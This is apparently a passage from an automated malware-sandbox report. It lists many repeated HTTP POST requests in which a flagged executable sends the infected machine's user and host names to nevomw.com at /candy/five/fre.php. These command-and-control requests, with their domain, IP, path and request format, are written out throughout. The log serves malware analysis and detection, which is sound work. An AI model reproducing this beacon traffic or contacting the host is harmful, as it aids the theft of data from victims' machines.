                                            Dec 2, 2020 11:54:08.564369917 CET1591OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 10 00 00 00 65 00 6e 00 67 00 69 00 6e 00 65 00 65 00 72 00 01 00 0c 00 00 00 33 00 36 00 37 00 37 00 30 00 36 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31
                                            Data Ascii: (ckav.ruengineer367706DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                            Dec 2, 2020 11:54:08.637877941 CET1591INHTTP/1.1 404 Not Found
                                            Server: nginx
                                            Date: Wed, 02 Dec 2020 10:54:08 GMT
                                            Content-Type: text/html; charset=UTF-8
                                            Content-Length: 23
                                            Connection: close
                                            X-Powered-By: PHP/7.4.10RC1
                                            Status: 404 Not Found
                                            Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                            Data Ascii: File not found.


                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                            189192.168.2.64993745.144.3.23480C:\Users\user\Desktop\SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exe
                                            TimestampkBytes transferredDirectionData
                                            Dec 2, 2020 11:54:09.113024950 CET1592OUTPOST /candy/five/fre.php HTTP/1.0
                                            User-Agent: Mozilla/4.08 (Charon; Inferno)
                                            Host: nevomw.com
                                            Accept: */*
                                            Content-Type: application/octet-stream
                                            Content-Encoding: binary
                                            Content-Key: F1D39DE6
                                            Content-Length: 169
                                            Connection: close
                                            Dec 2, 2020 11:54:09.166830063 CET1592OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 10 00 00 00 65 00 6e 00 67 00 69 00 6e 00 65 00 65 00 72 00 01 00 0c 00 00 00 33 00 36 00 37 00 37 00 30 00 36 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31
                                            Data Ascii: (ckav.ruengineer367706DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                            Dec 2, 2020 11:54:09.240145922 CET1593INHTTP/1.1 404 Not Found
                                            Server: nginx
                                            Date: Wed, 02 Dec 2020 10:54:09 GMT
                                            Content-Type: text/html; charset=UTF-8
                                            Content-Length: 23
                                            Connection: close
                                            X-Powered-By: PHP/7.4.10RC1
                                            Status: 404 Not Found
                                            Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                            Data Ascii: File not found.


                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                            19192.168.2.64973245.144.3.23480C:\Users\user\Desktop\SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exe
                                            TimestampkBytes transferredDirectionData
                                            Dec 2, 2020 11:52:51.071178913 CET98OUTPOST /candy/five/fre.php HTTP/1.0
                                            User-Agent: Mozilla/4.08 (Charon; Inferno)
                                            Host: nevomw.com
                                            Accept: */*
                                            Content-Type: application/octet-stream
                                            Content-Encoding: binary
                                            Content-Key: F1D39DE6
                                            Content-Length: 169
                                            Connection: close
                                            Dec 2, 2020 11:52:51.123859882 CET98OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 10 00 00 00 65 00 6e 00 67 00 69 00 6e 00 65 00 65 00 72 00 01 00 0c 00 00 00 33 00 36 00 37 00 37 00 30 00 36 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31
                                            Data Ascii: (ckav.ruengineer367706DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                            Dec 2, 2020 11:52:51.201095104 CET98INHTTP/1.1 404 Not Found
                                            Server: nginx
                                            Date: Wed, 02 Dec 2020 10:52:51 GMT
                                            Content-Type: text/html; charset=UTF-8
                                            Content-Length: 23
                                            Connection: close
                                            X-Powered-By: PHP/7.4.10RC1
                                            Status: 404 Not Found
                                            Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                            Data Ascii: File not found.


                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                            190192.168.2.64993845.144.3.23480C:\Users\user\Desktop\SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exe
                                            TimestampkBytes transferredDirectionData
                                            Dec 2, 2020 11:54:11.242526054 CET1594OUTPOST /candy/five/fre.php HTTP/1.0
                                            User-Agent: Mozilla/4.08 (Charon; Inferno)
                                            Host: nevomw.com
                                            Accept: */*
                                            Content-Type: application/octet-stream
                                            Content-Encoding: binary
                                            Content-Key: F1D39DE6
                                            Content-Length: 169
                                            Connection: close
                                            Dec 2, 2020 11:54:11.302968979 CET1594OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 10 00 00 00 65 00 6e 00 67 00 69 00 6e 00 65 00 65 00 72 00 01 00 0c 00 00 00 33 00 36 00 37 00 37 00 30 00 36 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31
                                            Data Ascii: (ckav.ruengineer367706DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                            Dec 2, 2020 11:54:11.376329899 CET1594INHTTP/1.1 404 Not Found
                                            Server: nginx
                                            Date: Wed, 02 Dec 2020 10:54:11 GMT
                                            Content-Type: text/html; charset=UTF-8
                                            Content-Length: 23
                                            Connection: close
                                            X-Powered-By: PHP/7.4.10RC1
                                            Status: 404 Not Found
                                            Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                            Data Ascii: File not found.


                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                            191192.168.2.64993945.144.3.23480C:\Users\user\Desktop\SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exe
                                            TimestampkBytes transferredDirectionData
                                            Dec 2, 2020 11:54:11.639262915 CET1595OUTPOST /candy/five/fre.php HTTP/1.0
                                            User-Agent: Mozilla/4.08 (Charon; Inferno)
                                            Host: nevomw.com
                                            Accept: */*
                                            Content-Type: application/octet-stream
                                            Content-Encoding: binary
                                            Content-Key: F1D39DE6
                                            Content-Length: 169
                                            Connection: close
                                            Dec 2, 2020 11:54:11.692301989 CET1595OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 10 00 00 00 65 00 6e 00 67 00 69 00 6e 00 65 00 65 00 72 00 01 00 0c 00 00 00 33 00 36 00 37 00 37 00 30 00 36 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31
                                            Data Ascii: (ckav.ruengineer367706DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                            Dec 2, 2020 11:54:11.771996021 CET1596INHTTP/1.1 404 Not Found
                                            Server: nginx
                                            Date: Wed, 02 Dec 2020 10:54:11 GMT
                                            Content-Type: text/html; charset=UTF-8
                                            Content-Length: 23
                                            Connection: close
                                            X-Powered-By: PHP/7.4.10RC1
                                            Status: 404 Not Found
                                            Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                            Data Ascii: File not found.


                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                            192192.168.2.64994045.144.3.23480C:\Users\user\Desktop\SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exe
                                            TimestampkBytes transferredDirectionData
                                            Dec 2, 2020 11:54:12.071896076 CET1596OUTPOST /candy/five/fre.php HTTP/1.0
                                            User-Agent: Mozilla/4.08 (Charon; Inferno)
                                            Host: nevomw.com
                                            Accept: */*
                                            Content-Type: application/octet-stream
                                            Content-Encoding: binary
                                            Content-Key: F1D39DE6
                                            Content-Length: 169
                                            Connection: close
                                            Dec 2, 2020 11:54:12.125400066 CET1597OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 10 00 00 00 65 00 6e 00 67 00 69 00 6e 00 65 00 65 00 72 00 01 00 0c 00 00 00 33 00 36 00 37 00 37 00 30 00 36 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31
                                            Data Ascii: (ckav.ruengineer367706DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                            Dec 2, 2020 11:54:12.200444937 CET1597INHTTP/1.1 404 Not Found
                                            Server: nginx
                                            Date: Wed, 02 Dec 2020 10:54:12 GMT
                                            Content-Type: text/html; charset=UTF-8
                                            Content-Length: 23
                                            Connection: close
                                            X-Powered-By: PHP/7.4.10RC1
                                            Status: 404 Not Found
                                            Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                            Data Ascii: File not found.


                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                            193192.168.2.64994145.144.3.23480C:\Users\user\Desktop\SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exe
                                            TimestampkBytes transferredDirectionData
                                            Dec 2, 2020 11:54:12.634165049 CET1598OUTPOST /candy/five/fre.php HTTP/1.0
                                            User-Agent: Mozilla/4.08 (Charon; Inferno)
                                            Host: nevomw.com
                                            Accept: */*
                                            Content-Type: application/octet-stream
                                            Content-Encoding: binary
                                            Content-Key: F1D39DE6
                                            Content-Length: 169
                                            Connection: close
                                            Dec 2, 2020 11:54:12.686851978 CET1598OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 10 00 00 00 65 00 6e 00 67 00 69 00 6e 00 65 00 65 00 72 00 01 00 0c 00 00 00 33 00 36 00 37 00 37 00 30 00 36 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31
                                            Data Ascii: (ckav.ruengineer367706DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                            Dec 2, 2020 11:54:12.768111944 CET1599INHTTP/1.1 404 Not Found
                                            Server: nginx
                                            Date: Wed, 02 Dec 2020 10:54:12 GMT
                                            Content-Type: text/html; charset=UTF-8
                                            Content-Length: 23
                                            Connection: close
                                            X-Powered-By: PHP/7.4.10RC1
                                            Status: 404 Not Found
                                            Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                            Data Ascii: File not found.


                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                            194192.168.2.64994245.144.3.23480C:\Users\user\Desktop\SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exe
                                            TimestampkBytes transferredDirectionData
                                            Dec 2, 2020 11:54:13.017353058 CET1599OUTPOST /candy/five/fre.php HTTP/1.0
                                            User-Agent: Mozilla/4.08 (Charon; Inferno)
                                            Host: nevomw.com
                                            Accept: */*
                                            Content-Type: application/octet-stream
                                            Content-Encoding: binary
                                            Content-Key: F1D39DE6
                                            Content-Length: 169
                                            Connection: close
                                            Dec 2, 2020 11:54:13.069201946 CET1600OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 10 00 00 00 65 00 6e 00 67 00 69 00 6e 00 65 00 65 00 72 00 01 00 0c 00 00 00 33 00 36 00 37 00 37 00 30 00 36 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31
                                            Data Ascii: (ckav.ruengineer367706DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                            Dec 2, 2020 11:54:13.140944958 CET1600INHTTP/1.1 404 Not Found
                                            Server: nginx
                                            Date: Wed, 02 Dec 2020 10:54:13 GMT
                                            Content-Type: text/html; charset=UTF-8
                                            Content-Length: 23
                                            Connection: close
                                            X-Powered-By: PHP/7.4.10RC1
                                            Status: 404 Not Found
                                            Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                            Data Ascii: File not found.


                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                            195192.168.2.64994345.144.3.23480C:\Users\user\Desktop\SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exe
                                            TimestampkBytes transferredDirectionData
                                            Dec 2, 2020 11:54:13.460319996 CET1601OUTPOST /candy/five/fre.php HTTP/1.0
                                            User-Agent: Mozilla/4.08 (Charon; Inferno)
                                            Host: nevomw.com
                                            Accept: */*
                                            Content-Type: application/octet-stream
                                            Content-Encoding: binary
                                            Content-Key: F1D39DE6
                                            Content-Length: 169
                                            Connection: close
                                            Dec 2, 2020 11:54:13.514307022 CET1601OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 10 00 00 00 65 00 6e 00 67 00 69 00 6e 00 65 00 65 00 72 00 01 00 0c 00 00 00 33 00 36 00 37 00 37 00 30 00 36 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31
                                            Data Ascii: (ckav.ruengineer367706DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                            Dec 2, 2020 11:54:13.589608908 CET1601INHTTP/1.1 404 Not Found
                                            Server: nginx
                                            Date: Wed, 02 Dec 2020 10:54:13 GMT
                                            Content-Type: text/html; charset=UTF-8
                                            Content-Length: 23
                                            Connection: close
                                            X-Powered-By: PHP/7.4.10RC1
                                            Status: 404 Not Found
                                            Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                            Data Ascii: File not found.


                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                            196192.168.2.64994445.144.3.23480C:\Users\user\Desktop\SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exe
                                            TimestampkBytes transferredDirectionData
                                            Dec 2, 2020 11:54:13.903883934 CET1603OUTPOST /candy/five/fre.php HTTP/1.0
                                            User-Agent: Mozilla/4.08 (Charon; Inferno)
                                            Host: nevomw.com
                                            Accept: */*
                                            Content-Type: application/octet-stream
                                            Content-Encoding: binary
                                            Content-Key: F1D39DE6
                                            Content-Length: 169
                                            Connection: close
                                            Dec 2, 2020 11:54:13.956406116 CET1603OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 10 00 00 00 65 00 6e 00 67 00 69 00 6e 00 65 00 65 00 72 00 01 00 0c 00 00 00 33 00 36 00 37 00 37 00 30 00 36 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31
                                            Data Ascii: (ckav.ruengineer367706DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                            Dec 2, 2020 11:54:14.030296087 CET1603INHTTP/1.1 404 Not Found
                                            Server: nginx
                                            Date: Wed, 02 Dec 2020 10:54:14 GMT
                                            Content-Type: text/html; charset=UTF-8
                                            Content-Length: 23
                                            Connection: close
                                            X-Powered-By: PHP/7.4.10RC1
                                            Status: 404 Not Found
                                            Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                            Data Ascii: File not found.


                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                            197192.168.2.64994545.144.3.23480C:\Users\user\Desktop\SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exe
                                            TimestampkBytes transferredDirectionData
                                            Dec 2, 2020 11:54:14.273895979 CET1604OUTPOST /candy/five/fre.php HTTP/1.0
                                            User-Agent: Mozilla/4.08 (Charon; Inferno)
                                            Host: nevomw.com
                                            Accept: */*
                                            Content-Type: application/octet-stream
                                            Content-Encoding: binary
                                            Content-Key: F1D39DE6
                                            Content-Length: 169
                                            Connection: close
                                            Dec 2, 2020 11:54:14.326558113 CET1604OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 10 00 00 00 65 00 6e 00 67 00 69 00 6e 00 65 00 65 00 72 00 01 00 0c 00 00 00 33 00 36 00 37 00 37 00 30 00 36 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31
                                            Data Ascii: (ckav.ruengineer367706DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                            Dec 2, 2020 11:54:14.412825108 CET1605INHTTP/1.1 404 Not Found
                                            Server: nginx
                                            Date: Wed, 02 Dec 2020 10:54:14 GMT
                                            Content-Type: text/html; charset=UTF-8
                                            Content-Length: 23
                                            Connection: close
                                            X-Powered-By: PHP/7.4.10RC1
                                            Status: 404 Not Found
                                            Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                            Data Ascii: File not found.


                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                            198192.168.2.64994645.144.3.23480C:\Users\user\Desktop\SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exe
                                            TimestampkBytes transferredDirectionData
                                            Dec 2, 2020 11:54:14.721467972 CET1605OUTPOST /candy/five/fre.php HTTP/1.0
                                            User-Agent: Mozilla/4.08 (Charon; Inferno)
                                            Host: nevomw.com
                                            Accept: */*
                                            Content-Type: application/octet-stream
                                            Content-Encoding: binary
                                            Content-Key: F1D39DE6
                                            Content-Length: 169
                                            Connection: close
                                            Dec 2, 2020 11:54:14.773554087 CET1606OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 10 00 00 00 65 00 6e 00 67 00 69 00 6e 00 65 00 65 00 72 00 01 00 0c 00 00 00 33 00 36 00 37 00 37 00 30 00 36 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31
                                            Data Ascii: (ckav.ruengineer367706DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                            Dec 2, 2020 11:54:14.852649927 CET1606INHTTP/1.1 404 Not Found
                                            Server: nginx
                                            Date: Wed, 02 Dec 2020 10:54:14 GMT
                                            Content-Type: text/html; charset=UTF-8
                                            Content-Length: 23
                                            Connection: close
                                            X-Powered-By: PHP/7.4.10RC1
                                            Status: 404 Not Found
                                            Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                            Data Ascii: File not found.


                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                            199192.168.2.64994745.144.3.23480C:\Users\user\Desktop\SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exe
                                            TimestampkBytes transferredDirectionData
                                            Dec 2, 2020 11:54:15.132386923 CET1607OUTPOST /candy/five/fre.php HTTP/1.0
                                            User-Agent: Mozilla/4.08 (Charon; Inferno)
                                            Host: nevomw.com
                                            Accept: */*
                                            Content-Type: application/octet-stream
                                            Content-Encoding: binary
                                            Content-Key: F1D39DE6
                                            Content-Length: 169
                                            Connection: close
                                            Dec 2, 2020 11:54:15.187186003 CET1607OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 10 00 00 00 65 00 6e 00 67 00 69 00 6e 00 65 00 65 00 72 00 01 00 0c 00 00 00 33 00 36 00 37 00 37 00 30 00 36 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31
                                            Data Ascii: (ckav.ruengineer367706DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                            Dec 2, 2020 11:54:15.261504889 CET1608INHTTP/1.1 404 Not Found
                                            Server: nginx
                                            Date: Wed, 02 Dec 2020 10:54:15 GMT
                                            Content-Type: text/html; charset=UTF-8
                                            Content-Length: 23
                                            Connection: close
                                            X-Powered-By: PHP/7.4.10RC1
                                            Status: 404 Not Found
                                            Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                            Data Ascii: File not found.


                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                            2192.168.2.64971445.144.3.23480C:\Users\user\Desktop\SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exe
                                            TimestampkBytes transferredDirectionData
                                            Dec 2, 2020 11:52:42.190738916 CET60OUTPOST /candy/five/fre.php HTTP/1.0
                                            User-Agent: Mozilla/4.08 (Charon; Inferno)
                                            Host: nevomw.com
                                            Accept: */*
                                            Content-Type: application/octet-stream
                                            Content-Encoding: binary
                                            Content-Key: F1D39DE6
                                            Content-Length: 169
                                            Connection: close
                                            Dec 2, 2020 11:52:42.243526936 CET60OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 10 00 00 00 65 00 6e 00 67 00 69 00 6e 00 65 00 65 00 72 00 01 00 0c 00 00 00 33 00 36 00 37 00 37 00 30 00 36 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31
                                            Data Ascii: (ckav.ruengineer367706DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                            Dec 2, 2020 11:52:42.317408085 CET60INHTTP/1.1 404 Not Found
                                            Server: nginx
                                            Date: Wed, 02 Dec 2020 10:52:42 GMT
                                            Content-Type: text/html; charset=UTF-8
                                            Content-Length: 23
                                            Connection: close
                                            X-Powered-By: PHP/7.4.10RC1
                                            Status: 404 Not Found
                                            Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                            Data Ascii: File not found.


                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                            20192.168.2.64973345.144.3.23480C:\Users\user\Desktop\SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exe
                                            TimestampkBytes transferredDirectionData
                                            Dec 2, 2020 11:52:51.489197016 CET99OUTPOST /candy/five/fre.php HTTP/1.0
                                            User-Agent: Mozilla/4.08 (Charon; Inferno)
                                            Host: nevomw.com
                                            Accept: */*
                                            Content-Type: application/octet-stream
                                            Content-Encoding: binary
                                            Content-Key: F1D39DE6
                                            Content-Length: 169
                                            Connection: close
                                            Dec 2, 2020 11:52:51.541227102 CET99OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 10 00 00 00 65 00 6e 00 67 00 69 00 6e 00 65 00 65 00 72 00 01 00 0c 00 00 00 33 00 36 00 37 00 37 00 30 00 36 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31
                                            Data Ascii: (ckav.ruengineer367706DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                            Dec 2, 2020 11:52:51.665469885 CET100INHTTP/1.1 404 Not Found
                                            Server: nginx
                                            Date: Wed, 02 Dec 2020 10:52:51 GMT
                                            Content-Type: text/html; charset=UTF-8
                                            Content-Length: 23
                                            Connection: close
                                            X-Powered-By: PHP/7.4.10RC1
                                            Status: 404 Not Found
                                            Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                            Data Ascii: File not found.


                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                            200192.168.2.64994845.144.3.23480C:\Users\user\Desktop\SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exe
                                            TimestampkBytes transferredDirectionData
                                            Dec 2, 2020 11:54:15.547116041 CET1609OUTPOST /candy/five/fre.php HTTP/1.0
                                            User-Agent: Mozilla/4.08 (Charon; Inferno)
                                            Host: nevomw.com
                                            Accept: */*
                                            Content-Type: application/octet-stream
                                            Content-Encoding: binary
                                            Content-Key: F1D39DE6
                                            Content-Length: 169
                                            Connection: close
                                            Dec 2, 2020 11:54:15.599518061 CET1609OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 10 00 00 00 65 00 6e 00 67 00 69 00 6e 00 65 00 65 00 72 00 01 00 0c 00 00 00 33 00 36 00 37 00 37 00 30 00 36 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31
                                            Data Ascii: (ckav.ruengineer367706DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                            Dec 2, 2020 11:54:15.675228119 CET1610INHTTP/1.1 404 Not Found
                                            Server: nginx
                                            Date: Wed, 02 Dec 2020 10:54:15 GMT
                                            Content-Type: text/html; charset=UTF-8
                                            Content-Length: 23
                                            Connection: close
                                            X-Powered-By: PHP/7.4.10RC1
                                            Status: 404 Not Found
                                            Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                            Data Ascii: File not found.


                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                            201192.168.2.64994945.144.3.23480C:\Users\user\Desktop\SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exe
                                            TimestampkBytes transferredDirectionData
                                            Dec 2, 2020 11:54:15.920391083 CET1610OUTPOST /candy/five/fre.php HTTP/1.0
                                            User-Agent: Mozilla/4.08 (Charon; Inferno)
                                            Host: nevomw.com
                                            Accept: */*
                                            Content-Type: application/octet-stream
                                            Content-Encoding: binary
                                            Content-Key: F1D39DE6
                                            Content-Length: 169
                                            Connection: close
                                            Dec 2, 2020 11:54:15.978032112 CET1611OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 10 00 00 00 65 00 6e 00 67 00 69 00 6e 00 65 00 65 00 72 00 01 00 0c 00 00 00 33 00 36 00 37 00 37 00 30 00 36 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31
                                            Data Ascii: (ckav.ruengineer367706DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                            Dec 2, 2020 11:54:16.055699110 CET1611INHTTP/1.1 404 Not Found
                                            Server: nginx
                                            Date: Wed, 02 Dec 2020 10:54:16 GMT
                                            Content-Type: text/html; charset=UTF-8
                                            Content-Length: 23
                                            Connection: close
                                            X-Powered-By: PHP/7.4.10RC1
                                            Status: 404 Not Found
                                            Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                            Data Ascii: File not found.


                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                            202192.168.2.64995045.144.3.23480C:\Users\user\Desktop\SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exe
                                            TimestampkBytes transferredDirectionData
                                            Dec 2, 2020 11:54:16.357728004 CET1612OUTPOST /candy/five/fre.php HTTP/1.0
                                            User-Agent: Mozilla/4.08 (Charon; Inferno)
                                            Host: nevomw.com
                                            Accept: */*
                                            Content-Type: application/octet-stream
                                            Content-Encoding: binary
                                            Content-Key: F1D39DE6
                                            Content-Length: 169
                                            Connection: close
                                            Dec 2, 2020 11:54:16.410058975 CET1612OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 10 00 00 00 65 00 6e 00 67 00 69 00 6e 00 65 00 65 00 72 00 01 00 0c 00 00 00 33 00 36 00 37 00 37 00 30 00 36 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31
                                            Data Ascii: (ckav.ruengineer367706DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                            Dec 2, 2020 11:54:16.485110998 CET1613INHTTP/1.1 404 Not Found
                                            Server: nginx
                                            Date: Wed, 02 Dec 2020 10:54:16 GMT
                                            Content-Type: text/html; charset=UTF-8
                                            Content-Length: 23
                                            Connection: close
                                            X-Powered-By: PHP/7.4.10RC1
                                            Status: 404 Not Found
                                            Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                            Data Ascii: File not found.


                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                            203192.168.2.64995345.144.3.23480C:\Users\user\Desktop\SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exe
                                            TimestampkBytes transferredDirectionData
                                            Dec 2, 2020 11:54:16.721966982 CET1627OUTPOST /candy/five/fre.php HTTP/1.0
                                            User-Agent: Mozilla/4.08 (Charon; Inferno)
                                            Host: nevomw.com
                                            Accept: */*
                                            Content-Type: application/octet-stream
                                            Content-Encoding: binary
                                            Content-Key: F1D39DE6
                                            Content-Length: 169
                                            Connection: close
                                            Dec 2, 2020 11:54:16.774810076 CET1634OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 10 00 00 00 65 00 6e 00 67 00 69 00 6e 00 65 00 65 00 72 00 01 00 0c 00 00 00 33 00 36 00 37 00 37 00 30 00 36 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31
                                            Data Ascii: (ckav.ruengineer367706DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                            Dec 2, 2020 11:54:16.854005098 CET1634INHTTP/1.1 404 Not Found
                                            Server: nginx
                                            Date: Wed, 02 Dec 2020 10:54:16 GMT
                                            Content-Type: text/html; charset=UTF-8
                                            Content-Length: 23
                                            Connection: close
                                            X-Powered-By: PHP/7.4.10RC1
                                            Status: 404 Not Found
                                            Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                            Data Ascii: File not found.


                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                            204192.168.2.64995445.144.3.23480C:\Users\user\Desktop\SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exe
                                            TimestampkBytes transferredDirectionData
                                            Dec 2, 2020 11:54:17.155236959 CET1635OUTPOST /candy/five/fre.php HTTP/1.0
                                            User-Agent: Mozilla/4.08 (Charon; Inferno)
                                            Host: nevomw.com
                                            Accept: */*
                                            Content-Type: application/octet-stream
                                            Content-Encoding: binary
                                            Content-Key: F1D39DE6
